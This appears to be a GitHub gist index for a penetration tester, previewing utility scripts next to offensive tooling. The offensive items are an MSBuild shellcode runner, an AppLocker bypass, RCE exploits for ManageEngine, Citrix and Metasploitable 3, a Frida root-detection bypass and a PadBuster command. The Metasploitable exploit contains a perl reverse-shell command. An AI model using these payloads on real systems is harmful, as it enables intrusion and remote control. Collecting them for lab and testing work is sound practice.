LongCat pich4ya

Block or report user

Report or block pich4ya

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
View fix_virtualenv
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / magisk_pixel3a.txt
Last active May 16, 2020
Clean Flash Magisk on Pixel 3a (Android 9)
View magisk_pixel3a.txt
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)
Connect Pixel 3a to MBP > allow access in the device's prompt.
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
View shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View src-2020-0011.py
#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
@pich4ya
pich4ya / readme_render_exploit.py
Last active Feb 8, 2020
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
View readme_render_exploit.py
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests
# 1. tmp upload
host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
@pich4ya
pich4ya / netscaler_exploit.py
Created Jan 19, 2020 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
View netscaler_exploit.py
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
    endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / secureRootCert1.java
Last active Nov 29, 2019
How to avoid trusting all HTTPS certificates when connecting to an internal API whose API server uses a certificate issued by an internal root CA
View secureRootCert1.java
/*
Requirements:
- Make sure you already have the root certificate file
- Set $JAVA_HOME to the correct location and make sure the file $JAVA_HOME/jre/lib/security/cacerts exists
- The Java keystore password is changeit by default
Steps:
1. First download or request the root certificate you are going to use
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
@pich4ya
pich4ya / root_bypass.js
Created Aug 5, 2019
Bypass Android Root Detection / Bypass RootBeer - August 2019
View root_bypass.js
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / padbuster_macos2019.txt
Created Aug 5, 2019
Install PadBuster on macOS Mojave 10.14.5
View padbuster_macos2019.txt
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'
git clone https://github.com/GDSSecurity/PadBuster && cd PadBuster
perl padbuster.pl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"